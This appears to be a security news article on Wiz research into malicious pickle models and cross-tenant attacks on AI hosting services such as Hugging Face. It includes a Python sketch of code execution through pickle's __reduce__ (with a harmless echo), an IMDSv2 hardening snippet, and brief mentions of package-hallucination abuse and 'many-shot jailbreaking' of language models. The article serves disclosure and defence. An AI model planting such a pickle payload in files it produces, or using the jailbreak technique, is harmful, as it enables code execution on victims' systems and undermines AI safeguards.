AI-as-a-Service Providers at Risk of Privilege Escalation and Cross-Tenant Attacks

New research has uncovered critical vulnerabilities in artificial intelligence (AI)-as-a-service providers such as Hugging Face that could allow threat actors to compromise sensitive data and access target environments. The study, conducted by Wiz researchers Shir Tamari and Sagi Tzadik, found that malicious models pose a significant risk to AI systems, particularly those hosted by service providers, because attackers can weaponize uploaded models to launch cross-tenant attacks.

The risks identified in the study involve shared inference infrastructure takeover and shared CI/CD takeover: threat actors can upload untrusted models in pickle format that execute code on the shared inference infrastructure, or compromise the service's CI/CD pipeline to mount supply chain attacks. The consequences of such a breach could be severe, allowing attackers to access the platform's custom models, escalate privileges, and reach other customers' data stored within the service.
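
The danger of pickle-format models comes from the fact that pickle deserialization can execute arbitrary code. The following is a minimal, self-contained Python sketch of that general technique, not the researchers' actual proof of concept; the file name model.pkl and the harmless echo command are purely illustrative.

import os
import pickle

class MaliciousModel:
    # pickle calls __reduce__ to learn how to rebuild the object; returning
    # (os.system, (command,)) makes deserialization run that command instead
    # of restoring data.
    def __reduce__(self):
        return (os.system, ("echo 'code ran during model load'",))

# Attacker side: serialize the payload into something that looks like a model file.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Victim side: any service that naively calls pickle.load() on the file runs
# the attacker's command (here a harmless echo) inside its own environment.
with open("model.pkl", "rb") as f:
    pickle.load(f)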

To address these risks, the researchers recommend enabling IMDSv2 with a hop limit to prevent containers from reaching the Instance Metadata Service and obtaining node credentials. They also encourage users to source models only from trusted providers, enable multi-factor authentication, and avoid using pickle files in production environments.
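
As a concrete illustration of the IMDSv2 recommendation, the sketch below uses boto3 (an assumption for this example, not a tool the researchers prescribe) to require session tokens and cap the response hop limit at 1 on an EC2 instance; the instance ID is a placeholder.

import boto3

ec2 = boto3.client("ec2")

# Require IMDSv2 session tokens and cap metadata responses at one network hop,
# so containerized workloads routed through the host cannot fetch the node's
# role credentials from the Instance Metadata Service.
ec2.modify_instance_metadata_options(
    InstanceId="i-0123456789abcdef0",  # placeholder instance ID
    HttpTokens="required",             # enforce token-based IMDSv2 access
    HttpPutResponseHopLimit=1,         # drop responses that must cross a hop
    HttpEndpoint="enabled",
)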

The disclosure follows research from Lasso Security showing that generative AI models such as OpenAI's ChatGPT and Google's Gemini can be coaxed into recommending non-existent code packages, which attackers can then publish with malicious content. Separately, AI company Anthropic detailed a technique called "many-shot jailbreaking" that abuses the long context windows of large language models to bypass their safety protections.

As the use of AI continues to expand, it is crucial for organizations and service providers to prioritize security and address vulnerabilities before they can be exploited. The findings underscore the importance of exercising caution when adopting AI technologies and the need for ongoing work to strengthen security across the AI ecosystem.
